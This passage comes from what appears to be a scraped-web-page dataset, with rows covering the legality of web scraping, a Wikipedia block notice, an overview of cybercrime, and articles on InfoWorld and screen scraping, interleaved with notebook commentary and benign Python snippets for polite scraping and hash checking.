hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
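The article in row 609 describes the same workflow this notebook relies on: fetch a page over HTTP, parse the HTML into a tree, pull out the text, and clean it with regular expressions. Below is a minimal sketch of that loop using the libraries already installed at the top of the notebook (requests, BeautifulSoup with html5lib, and re); the target URL, the User-Agent string, and the whitespace-only cleanup are illustrative assumptions rather than part of the original pipeline.

# Minimal fetch -> parse -> extract -> clean loop, as described in row 609.
# The User-Agent string and the simplified cleanup regex are assumptions.
import re
import requests
from bs4 import BeautifulSoup

def scrape_paragraph_text(url, timeout=10):
    headers = {"User-Agent": "example-scraper/0.1 (educational use)"}
    response = requests.get(url, headers=headers, timeout=timeout)
    response.raise_for_status()  # stop early on 4xx/5xx responses
    # Parse the HTML into a DOM-like tree (html5lib is installed in this notebook).
    soup = BeautifulSoup(response.text, "html5lib")
    # Join the visible text of every <p> element, then collapse whitespace.
    text = " ".join(p.get_text(" ", strip=True) for p in soup.find_all("p"))
    return re.sub(r"\s+", " ", text).strip()

# Hypothetical usage:
# print(scrape_paragraph_text("https://en.wikipedia.org/wiki/Web_scraping")[:300])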
610 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit&section=1 | Wikipedia returned a permission notice instead of an edit form: the IP range 180.190.0.0/16 (current address 180.190.75.212) is blocked from editing by administrator Stwalkerster until 09:06, 22 May 2032 in response to abuse, and a separate global block on the same range expires on 17:48, 21 December 2024. Registered users are still able to edit, and affected editors are directed to Wikipedia's unblock and block-appeal procedures. |
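Row 609 closes by noting that site administrators use various measures to stop or slow bots, and row 610 shows what that looks like from the scraper's side: an edit endpoint returned a block notice instead of article text. The sketch below illustrates two defensive habits under stated assumptions: it consults robots.txt before fetching, and it backs off and retries when a response looks like a block page. The marker phrases, the User-Agent string, and the delay values are illustrative assumptions, not a definitive detection scheme.

# Sketch: respect robots.txt and back off when a response looks like a block page.
# BLOCK_MARKERS, the User-Agent, and the delays are illustrative assumptions.
import time
import requests
from urllib.parse import urlparse
from urllib.robotparser import RobotFileParser

BLOCK_MARKERS = ("do not have permission", "has been blocked", "captcha")

def allowed_by_robots(url, user_agent="example-scraper/0.1"):
    parts = urlparse(url)
    robots = RobotFileParser()
    robots.set_url(f"{parts.scheme}://{parts.netloc}/robots.txt")
    robots.read()
    return robots.can_fetch(user_agent, url)

def polite_get(url, retries=3, base_delay=5):
    if not allowed_by_robots(url):
        raise PermissionError(f"robots.txt disallows fetching {url}")
    for attempt in range(1, retries + 1):
        response = requests.get(url, timeout=10,
                                headers={"User-Agent": "example-scraper/0.1"})
        body = response.text.lower()
        if response.ok and not any(marker in body for marker in BLOCK_MARKERS):
            return response
        time.sleep(base_delay * attempt)  # simple linear back-off between attempts
    raise RuntimeError(f"Blocked or failing after {retries} attempts: {url}")

Checking robots.txt and spacing out retries keeps a scraper on the polite side of the anti-bot measures listed above; heavier countermeasures (CAPTCHAs, hard IP blocks like the one in row 610) generally cannot and should not be worked around by the scraper itself.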
611 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Cybercrime | Cybercrime encompasses a wide range of criminal activities that are carried out using digital devices and or networks. These crimes involve the use of technology to commit fraud, identity theft, data breaches, computer viruses, scams, and expanded upon in other malicious acts. Cybercriminals exploit vulnerabilities in computer systems and networks to gain unauthorized access, steal sensitive information, disrupt services, and cause financial or reputational harm to individuals, organizations, and governments. 1 In 2000, the tenth United Nations Congress on the Prevention of Crime and the Treatment of Offenders placed cyber crimes into five categories: unauthorized access, damage to computer data or programs, sabotage to hinder the functioning of a computer system or network, unauthorized interception of data within a system or network, and computer espionage. 1 Internationally, both state and non-state actors engage in cybercrimes, including espionage, financial theft, and other cross-border crimes. Cybercrimes crossing international borders and involving the actions of at least one nation-state are sometimes referred to as cyberwarfare. Warren Buffett has said that cybercrime is the "number one problem with mankind" 2 and that it "poses real risks to humanity". 3 The World Economic Forum's (WEF) 2020 Global Risks Report confirmed that organized cybercrime groups are joining forces to commit criminal activities online, while estimating the likelihood of their detection and prosecution to be less than 1 percent in the US. 4 There are also many privacy concerns surrounding cybercrime when confidential information is intercepted or disclosed, legally or otherwise. The World Economic Forum’s 2023 Global Risks Report ranks cybercrime as one of the top 10 risks facing the world today and for the next 10 years. 5 If cybercrime were viewed as a nation state, cybercrime would count as the third largest economy in the world. 6 In numbers, cybercrime is predicted to cause over 9 trillion in damages worldwide in 2024. 6 Computer crime encompasses a broad range of activities, including computer fraud, financial crimes, scams, cybersex trafficking, and ad-fraud. 7 8 Computer fraud is the act of using a computer to take or alter electronic data, or to gain unlawful use of a computer or system. 9 Computer fraud that involves the use of the internet is also called internet fraud. The legal definition of computer fraud varies by jurisdiction, but typically involves accessing a computer without permission or authorization. Forms of computer fraud include hacking into computers to alter information, distributing malicious code such as computer worms or viruses, installing malware or spyware to steal data, phishing, and advance-fee scams. 10 Other forms of fraud may be committed using computer systems, including bank fraud, carding, identity theft, extortion, and theft of classified information. These types of crimes often result in the loss of personal or financial information. The term cyberterrorism refers to acts of terrorism committed through the use of cyberspace or computer resources. 11 Acts of disruption of computer networks and personal computers through viruses, worms, phishing, malicious software, hardware, or programming scripts can all be forms of cyberterrorism. 
12 Government officials and information technology (IT) security specialists have documented a significant increase in network problems and server scams since early 2001. In the United States there is an increasing concern from agencies such as the Federal Bureau of Investigation (FBI) and the Central Intelligence Agency (CIA). 13 Cyberextortion occurs when a website, e-mail server, or computer system is subjected to or threatened with attacks by malicious hackers, often through denial-of-service attacks. Cyberextortionists demand money in return for promising to stop the attacks and provide "protection". According to the FBI, cyberextortionists are increasingly attacking corporate websites and networks, crippling their ability to operate, and demanding payments to restore their service. More than 20 cases are reported each month to the FBI, and many go unreported in order to keep the victim's name out of the public domain. Perpetrators often use a distributed denial-of-service attack. 14 However, other cyberextortion techniques exist, such as doxing and bug poaching. An example of cyberextortion was the Sony Hack of 2014. 15 Ransomware is a type of malware used in cyberextortion to restrict access to files, sometimes threatening permanent data erasure unless a ransom is paid. Ransomware is a global issue, with more than 300 million attacks worldwide in 2021. According to the 2022 Unit 42 Ransomware Threat Report, in 2021 the average ransom demand in cases handled by Norton climbed 144 percent to $2.2 million, and there was an 85 percent increase in the number of victims who had their personal information shown on dark web information dumps. 16 A loss of nearly $400 million in 2021 and 2022 is just one of the statistics showing the impact of ransomware attacks on everyday people. 17 Cybersex trafficking is the transportation of victims for such purposes as coerced prostitution or the live streaming of coerced sexual acts or rape on webcam. 18 19 20 21 Victims are abducted, threatened, or deceived and transferred to "cybersex dens". 22 23 24 The dens can be in any location where the cybersex traffickers have a computer, tablet, or phone with an internet connection. 20 Perpetrators use social media networks, video conferences, dating pages, online chat rooms, apps, dark web sites, 25 and other platforms. 26 They use online payment systems 25 27 28 and cryptocurrencies to hide their identities. 29 Millions of reports of cybersex incidents are sent to authorities annually. 30 New legislation and police procedures are needed to combat this type of cybercrime. 31 There are an estimated 6.3 million victims of cybersex trafficking, according to a recent report by the International Labour Organization. 32 This number includes about 1.7 million child victims. An example of cybersex trafficking is the 2018 2020 Nth room case in South Korea. 33 According to the U.S. Department of Defense, cyberspace has emerged as an arena for national-security threats through several recent events of geostrategic importance, including the attack on Estonia's infrastructure in 2007, allegedly by Russian hackers. In August 2008, Russia again allegedly conducted cyberattacks against Georgia. Fearing that such attacks may become a normal part of future warfare among nation-states, military commanders see a need to develop cyberspace operations. 34 When an individual is the target of cybercrime, the computer is often the tool rather than the target. 
These crimes, which typically exploit human weaknesses, usually do not require much technical expertise. These are the types of crimes which have existed for centuries in the offline world. Criminals have simply been given a tool that increases their pool of potential victims and makes them all the harder to trace and apprehend. 35 Crimes that use computer networks or devices to advance other ends include: The unsolicited sending of bulk email for commercial purposes (spam) is unlawful in some jurisdictions. Phishing is mostly propagated via email. Phishing emails may contain links to other websites that are affected by malware. 36 Or they may contain links to fake online banking or other websites used to steal private account information. The content of websites and other electronic communications may be distasteful, obscene, or offensive for a variety of reasons. In some instances, it may be illegal. What content is unlawful varies greatly between countries, and even within nations. It is a sensitive area in which the courts can become involved in arbitrating between groups with strong beliefs. One area of internet pornography that has been the target of the strongest efforts at curtailment is child pornography, which is illegal in most jurisdictions in the world. citation needed Ad-frauds are particularly popular among cybercriminals, as such frauds are lucrative and unlikely to be prosecuted. 37 Jean-Loup Richet, a professor at the Sorbonne Business School, classified the large variety of ad-frauds committed by cybercriminals into three categories: identity fraud, attribution fraud, and ad-fraud services. 8 Identity fraud aims to impersonate real users and inflate audience numbers. The techniques used for identity fraud include traffic from bots (coming from a hosting company, a data center, or compromised devices); cookie stuffing; falsification of user characteristics, such as location and browser type; fake social traffic (misleading users on social networks into visiting the advertised website); and fake social media accounts that make a bot appear legitimate. Attribution fraud impersonates the activities of real users, such as clicks and conversations. Many ad-fraud techniques belong to this category: the use of hijacked and malware-infected devices as part of a botnet; click farms (companies where low-wage employees are paid to click or engage in conversations); incentivized browsing; video placement abuse (delivered in display banner slots); hidden ads (which will never be viewed by real users); domain spoofing (ads served on a fake website); and clickjacking, in which the user is forced to click on an ad. Ad-fraud services include all online infrastructure and hosting services that might be needed to undertake identity or attribution fraud. Services can involve the creation of spam websites (fake networks of websites that provide artificial backlinks); link building services; hosting services; or fake and scam pages impersonating a famous brand. Whereas content may be offensive in a non-specific way, harassment directs obscenities and derogatory comments at specific individuals, often focusing on gender, race, religion, nationality, or sexual orientation. Committing a crime using a computer can lead to an enhanced sentence. For example, in the case of United States v. Neil Scott Kramer, the defendant was given an enhanced sentence according to the U.S. 
Sentencing Guidelines Manual 2G1.3(b)(3) for his use of a cell phone to "persuade, induce, entice, coerce, or facilitate the travel of, the minor to engage in prohibited sexual conduct. Kramer appealed the sentence on the grounds that there was insufficient evidence to convict him under this statute because his charge included persuading through a computer device and his cellular phone technically is not a computer. Although Kramer tried to argue this point, the U.S. Sentencing Guidelines Manual states that the term "computer" means "an electronic, magnetic, optical, electrochemical, or other high-speed data processing device performing logical, arithmetic, or storage functions, and includes any data storage facility or communications facility directly related to or operating in conjunction with such device. In the United States, at least 41 states have passed laws and regulations that regard extreme online harassment as a criminal act. These acts can also be prosecuted on the federal level, because of US Code 18 Section 2261A, which states that using computers to threaten or harass can lead to a sentence of up to 20 years. 38 Several countries besides the US have also created laws to combat online harassment. In China, a country with over 20 percent of the world's internet users, in response to the Human Flesh Search Engine bullying incident, the Legislative Affairs Office of the State Council passed a strict law against cyberbullying. 39 40 The United Kingdom passed the Malicious Communications Act, which states that sending messages or letters electronically that the government deems "indecent or grossly offensive" and or language intended to cause "distress and anxiety" can lead to a prison sentence of six months and a potentially large fine. 41 42 Australia, while not directly addressing the issue of harassment, includes most forms of online harassment under the Criminal Code Act of 1995. Using telecommunication to send threats, harass, or cause offense is a direct violation of this act. 43 Although freedom of speech is protected by law in most democratic societies, it does not include all types of speech. Spoken or written threats can be criminalized because they harm or intimidate. This applies to online or network-related threats. Cyberbullying has increased drastically with the growing popularity of online social networking. As of January 2020, 44 percent of adult internet users in the United States had "personally experienced online harassment". 44 Online harassment of children often has negative and even life-threatening effects. According to a 2021 survey, 41 percent of children develop social anxiety, 37 percent develop depression, and 26 percent have suicidal thoughts. 45 The United Arab Emirates was found to have purchased the NSO Group's mobile spyware Pegasus for mass surveillance and a campaign of harassment of prominent activists and journalists, including Ahmed Mansoor, Princess Latifa, Princess Haya, and others. Ghada Owais was one of the many high-profile female journalists and activists who were targeted. She filed a lawsuit against UAE ruler Mohamed bin Zayed Al Nahyan along with other defendants, accusing them of sharing her photos online. 46 Darknet markets are used to buy and sell recreational drugs online. Some drug traffickers use encrypted messaging tools to communicate with drug mules or potential customers. The dark web site Silk Road, which started operations in 2011, was the first major online marketplace for drugs. 
It was permanently shut down in October 2013 by the FBI and Europol. After Silk Road 2.0 went down, Silk Road 3 Reloaded emerged. However, it was just an older marketplace named Diabolus Market that used the Silk Road name in order to get more exposure from the Silk Road brand's earlier success. 47 Darknet markets have had a rise in traffic in recent years for many reasons, such as the anonymous purchases and often a system of reviews by other buyers. 48 There are many ways in which darknet markets can financially drain individuals. Vendors and customers alike go to great lengths to keep their identities a secret while online. Commonly used tools for hiding their online presence include virtual private networks (VPNs), Tails, and the Tor Browser. Darknet markets entice customers by making them feel comfortable. Although people can easily gain access to a Tor browser, actually gaining access to an illicit market is not as simple as typing it in on a search engine, as one would with Google. Darknet markets have special links that change frequently, ending in .onion as opposed to the typical .com, .net, and .org domain extensions. To add to privacy, the most prevalent currency on these markets is Bitcoin, which allows transactions to be anonymous. 49 A problem that marketplace users sometimes face is exit scamming. 50 That is, a vendor with a high rating acts as if they are selling on the market and have users pay for products they never receive. 51 The vendor then closes their account after receiving money from multiple buyers and never sending what was paid for. The vendors, all of whom are involved in illegal activities, have no reason not to engage in exit scamming when they no longer want to be a vendor. In 2019, an entire market known as Wall Street Market allegedly exit scammed, stealing $30 million dollars in bitcoin. 52 The FBI has cracked down on these markets. In July 2017, the FBI seized one of the biggest markets, commonly called Alphabay, which re-opened in August 2021 under the control of DeSnake, one of the original administrators. 53 54 Investigators pose as buyers and order products from darknet vendors in the hope that the vendors leave a trail the investigators can follow. In one case an investigator posed as a firearms seller, and for six months people purchased from them and provided home addresses. 55 The FBI was able to make over a dozen arrests during this six-month investigation. 55 Another crackdown targeted vendors selling fentanyl and opiates. With thousands of people dying each year due to drug overdose, investigators have made internet drug sales a priority. 56 Many vendors do not realize the extra criminal charges that go along with selling drugs online, such as money laundering and illegal use of the mail. 57 In 2019, a vendor was sentenced to 10 years in prison after selling cocaine and methamphetamine under the name JetSetLife. 58 But despite the large amount of time investigators spend tracking down people, in 2018 only 65 suspects who bought and sold illegal goods on some of the biggest markets were identified. 59 Meanwhile, thousands of transactions take place daily on these markets. Due to cybercriminals using the internet for cross-border attacks and crimes, the process of prosecuting cybercriminals has been difficult. The number of vulnerabilities that a cybercriminal has an opportunity has to exploit has also increased over the years. From 2008 to 2014 alone, there has been a 17.75% increase in vulnerabilities across all online devices. 
77 The internet's expansive reach causes the damage inflicted to people to be magnified since many methods of cybercrime have the opportunity to reach many people. The availability of virtual spaces 78 has allowed cybercrime to become an everyday occurrence. 79 In 2018, the Internet Crime Complaint Center received 351,937 complaints of cybercrime, which led to $2.7 billion lost. 80 In a criminal investigation, a computer can be a source of evidence (see digital forensics). Even when a computer is not directly used for criminal purposes, it may contain records of value to criminal investigators in the form of a logfile. In many countries, 81 Internet Service Providers are required by law to keep their logfiles for a predetermined amount of time. There are many ways for cybercrime to take place, and investigations tend to start with an IP Address trace; however, that does not necessarily enable detectives to solve a case. Different types of high-tech crime may also include elements of low-tech crime, and vice versa, making cybercrime investigators an indispensable part of modern law enforcement. Methods of cybercrime detective work are dynamic and constantly improving, whether in closed police units or in the framework of international cooperation. 82 In the United States, the FBI 83 and the Department of Homeland Security (DHS) 84 are government agencies that combat cybercrime. The FBI has trained agents and analysts in cybercrime placed in their field offices and headquarters. 83 In the DHS, the Secret Service has a Cyber Intelligence Section that works to target financial cybercrimes. They combat international cybercrime and work to protect institutions such as banks from intrusions and information breaches. Based in Alabama, the Secret Service and the Alabama Office of Prosecution Services work together to train professionals in law enforcement at the National Computer Forensic Institute. 84 85 86 The NCFI provides "state and local members of the law enforcement community with training in cyber incident response, investigation, and forensic examination in cyber incident response, investigation, and forensic examination. 86 Investigating cyber crime within the United States and globally often requires partnerships. Within the United States, cyber crime may be investigated by law enforcement, the Department of Homeland Security, among other federal agencies. However, as the world becomes more dependent on technology, cyber attacks and cyber crime are going to expand as threat actors will continue to exploit weaknesses in protection and existing vulnerabilities to achieve their end goals, often being data theft or exfiltration. To combat cybercrime, the United States Secret Service maintains an Electronic Crimes Task Force which extends beyond the United States as it helps to locate threat actors that are located globally and performing cyber related crimes within the United States. The Secret Service is also responsible for the National Computer Forensic Institute which allows law enforcement and people of the court to receive cyber training and information on how to combat cyber crime. The United States Immigration and Customs Enforcement is responsible for the Cyber Crimes Center (C3) providing cyber crime related services for federal, state, local and international agencies. 
Finally, the United States also has resources relating to Law Enforcement Cyber Incident Reporting to allow local and state agencies to understand how, when, and what should be reported as a cyber incident to the federal government. 87 Because cybercriminals commonly use encryption and other techniques to hide their identity and location, it can be difficult to trace a perpetrator after a crime is committed, so prevention measures are crucial. 79 88 The Department of Homeland Security also instituted the Continuous Diagnostics and Mitigation (CDM) Program. 89 The CDM Program monitors and secures government networks by tracking network risks and informing system personnel so that they can take action. In an attempt to catch intrusions before the damage is done, the DHS created the Enhanced Cybersecurity Services (ECS). 90 The Cyber Security and Infrastructure Security Agency approves the private partners that provide intrusion detection and prevention services through the ECS. 90 91 Cybersecurity professionals have been skeptical of prevention-focused strategies. 92 The mode of use of cybersecurity products has also been called into question. Shuman Ghosemajumder has argued that individual companies using a combination of products for security is not a scalable approach and has advocated for the use of cybersecurity technology primarily at the platform level. 93 On a personal level, there are some strategies available to defend against cybercrime: 94 Because of weak laws, cybercriminals operating from developing countries can often evade detection and prosecution. In countries such as the Philippines, laws against cybercrime are weak or sometimes nonexistent. Cybercriminals can then strike from across international borders and remain undetected. Even when identified, these criminals can typically avoid being extradited to a country such as the US that has laws that allow for prosecution. For this reason, agencies such as the FBI have used deception and subterfuge to catch criminals. For example, two Russian hackers had been evading the FBI for some time. The FBI set up a fake computing company based in Seattle, Washington. They proceeded to lure the two Russian men into the United States by offering them work with this company. Upon completion of the interview, the suspects were arrested. Clever tricks like that are sometimes a necessary part of catching cybercriminals when weak laws and limited international cooperation make it impossible otherwise. 95 The first cyber related law in the United States was the Privacy Act of 1974 which was only required for federal agencies to follow to ensure privacy and protection of personally identifiable information (PII). However, since 1974, in the United States other laws and regulations have been drafted and implemented, but there is still a gap in responding to current cyber related crime. The most recent cyber related law, according to NIST, was the NIST Small Business Cybersecurity Act, which came out in 2018, and provides guidelines to small businesses to ensure that cybersecurity risks are being identified and addressed accurately. 96 During President Barack Obama's presidency three cybersecurity related bills were signed into order in December 2014. The first was the Federal Information Security Modernization Act of 2014, the second was the National Cybersecurity Protection Act of 2014, and the third was the Cybersecurity Enhancement Act of 2014. 
Although the Federal Information Security Modernization Act of 2014 was just an update of an older version of the act, it focused on the practices federal agencies were to abide by relating to cybersecurity. While the National Cybersecurity Protection Act of 2014 was aimed toward increasing the amount of information sharing that occurs across the federal and private sector to improve cybersecurity amongst the industries. Finally, the Cybersecurity Enhancement Act of 2014 relates to cybersecurity research and education. 97 In April 2015, then-President Barack Obama released an executive order that allows the US to freeze the assets of convicted cybercriminals and block their economic activity within the United States. 98 The European Union adopted cybercrime directive 2013 40 EU, which was elaborated upon in the Council of Europe's Convention on Cybercrime. 99 It is not only the US and the European Union that have been introducing measures against cybercrime. On 31 May 2017, China announced that its new cybersecurity law was taking effect. 100 In Australia, legislation to combat cybercrime includes the Criminal Code Act 1995, the Telecommunications Act 1997, and the Enhancing Online Safety Act 2015. Penalties for computer-related crimes in New York State can range from a fine and a short period of jail time for a Class A misdemeanor, such as unauthorized use of a computer, up to 3 to 15 years in prison for a Class C felony, such as computer tampering in the first degree. 101 However, some former cybercriminals have been hired as information security experts by private companies due to their inside knowledge of computer crime, a phenomenon which theoretically could create perverse incentives. A possible counter to this is for courts to ban convicted hackers from using the internet or computers, even after they have been released from prison though as computers and the internet become more and more central to everyday life, this type of punishment becomes more and more draconian. Nuanced approaches have been developed that manage cyber offenders' behavior without resorting to total computer or internet bans. 102 These approaches involve restricting individuals to specific devices which are subject to monitoring or searches by probation or parole officers. 103 Cybercrime is becoming more of a threat in our society. According to Accenture's State of Cybersecurity, security attacks increased 31% from 2020 to 2021. The number of attacks per company increased from 206 to 270. Due to this rising threat, the importance of raising awareness about measures to protect information and the tactics criminals use to steal that information is paramount. However, despite cybercrime becoming a mounting problem, many people are not aware of the severity of this problem. This could be attributed to a lack of experience and knowledge of technological issues. There are 1.5 million cyber-attacks annually, which means that there are over 4,000 attacks a day, 170 attacks every hour, or nearly three attacks every minute, with studies showing that only 16 percent of victims had asked the people who were carrying out the attacks to stop. 104 Comparitech's 2023 study shows that cybercrime victims have peaked to 71 million annually, which means there is a cyberattack every 39 seconds. 105 Anybody who uses the internet for any reason can be a victim, which is why it is important to be aware of how to be protected while online. 
As cybercrime proliferated, a professional ecosystem evolved to support individuals and groups seeking to profit from cybercrime activities. The ecosystem has become quite specialized, and includes malware developers, botnet operators, professional cybercrime groups, groups specializing in the sale of stolen content, and so forth. A few of the leading cybersecurity companies have the skills and resources to follow the activities of these individuals and groups. 106 A wide variety of information that can be used for defensive purposes is available from these sources, for example, technical indicators such as hashes of infected files 107 and malicious IPs URLs, 107 as well as strategic information profiling the goals and techniques of the profiled groups. Much of it is freely available, but consistent, ongoing access typically requires a subscription. Some in the corporate sector see a crucial role for artificial intelligence in the future development of cybersecurity. 108 109 Interpol's Cyber Fusion Center began a collaboration with key cybersecurity players to distribute information on the latest online scams, cyber threats, and risks to internet users. Since 2017, reports on social engineering frauds, ransomware, phishing, and other attacks have been distributed to security agencies in over 150 countries. 110 The increasing prevalence of cybercrime has resulted in more attention to computer crime detection and prosecution. Hacking has become less complex as hacking communities disseminate their knowledge through the internet. citation needed Blogs and social networks have contributed substantially to information sharing, so that beginners can benefit from older hackers' knowledge and advice. Furthermore, hacking is cheaper than ever. Before the cloud computing era, in order to spam or scam, one needed a variety of resources, such as a dedicated server; skills in server management, network configuration, and network maintenance; and knowledge of internet service provider standards. By comparison, a software-as-a-service for mail is a scalable and inexpensive bulk e-mail-sending service for marketing purposes that could be easily set up for spam. 111 Cloud computing could help cybercriminals leverage their attacks, whether brute-forcing a password, improving the reach of a botnet, or facilitating a spamming campaign. 112 Cyber Crime. (n.d.). Folder . Federal Bureau of Investigation. Retrieved April 24, 2024, from https: www.fbi.gov investigate cyber Herrero, J., Torres, A., Vivas, P., Urue a, A. (2022). Smartphone Addiction, Social Support, and Cybercrime Victimization: A Discrete Survival and Growth Mixture Model: Psychosocial Intervention. Psychosocial Intervention, 31(1), 59 66. https: doi.org 10.5093 pi2022a3 |
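Technical indicators like the file hashes and malicious IPs/URLs mentioned above are usually consumed programmatically. A minimal sketch, assuming a hypothetical indicator set and file name (placeholder values, not real intelligence), of screening a downloaded file's SHA-256 digest against known-bad hashes:

```python
import hashlib
from pathlib import Path

# Hypothetical indicator feed: SHA-256 hashes of known-bad files (placeholder value).
KNOWN_BAD_HASHES = {"0" * 64}

def sha256_of(path: Path) -> str:
    """Hash the file in chunks so large downloads need not fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

sample = Path("downloaded_file.bin")   # hypothetical file to screen
if sample.exists():
    print(sample, "flagged:", sha256_of(sample) in KNOWN_BAD_HASHES)
```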
612 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/InfoWorld | InfoWorld (IW) is an American information technology media business. Founded in 1978, it began as a monthly magazine. In 2007, it transitioned to a web-only publication. Its parent company today is International Data Group, 2 and its sister publications include Macworld and PC World. InfoWorld is based in San Francisco, with contributors and supporting staff based across the U.S. 3 Since its founding, InfoWorld's readership has largely consisted of IT and business professionals. InfoWorld focuses on how-to, analysis, and editorial content from a mixture of experienced technology journalists and working technology practitioners. The site averages 4.6 million monthly page views and 1.1 million monthly unique visitors. 4 The magazine was founded by Jim Warren in 1978 as The Intelligent Machines Journal (IMJ). 5 It was sold to IDG in late 1979. On 18 February 1980, the magazine name was changed to InfoWorld. 1 In 1986, the Robert X. Cringely column began; for many, that pseudonymous column was the face of InfoWorld and its close ties to Silicon Valley in particular. 1 6 7 Up to and including the 15 June 1987 issue (volume 9, issue 24), InfoWorld was published by Popular Computing, Inc., a subsidiary of CW Communications, Inc. Since then it has been published by InfoWorld Publishing, Inc., a subsidiary of IDG Communications, Inc. Ethernet inventor Bob Metcalfe was CEO and publisher from 1991 to 1996, and contributed a weekly column until 2000. 8 9 As the magazine transitioned to be exclusively Web-based, the final print edition was dated 2 April 2007 (Volume 29, Issue 14, Number 1384). 1 In its web incarnation, InfoWorld has transitioned away from widely available news stories to a focus on how-to, expert testing, and thought leadership. 10 |
613 | https://en.wikipedia.org/wiki/Data_scraping | https://es.wikipedia.org/wiki/Screen_scraping | Screen scraping is the English name of a programming technique that consists of taking the presentation of some information (normally text, although it may include graphical information) and, through reverse engineering, extracting the data that gave rise to that presentation. For example: In general, it should be noted that the systems from which the information is extracted are not designed to have that information extracted (in some cases the opposite is true, as with CAPTCHA systems). An approximate Spanish rendering of screen scraping is raspado de pantalla. |
614 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-5 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
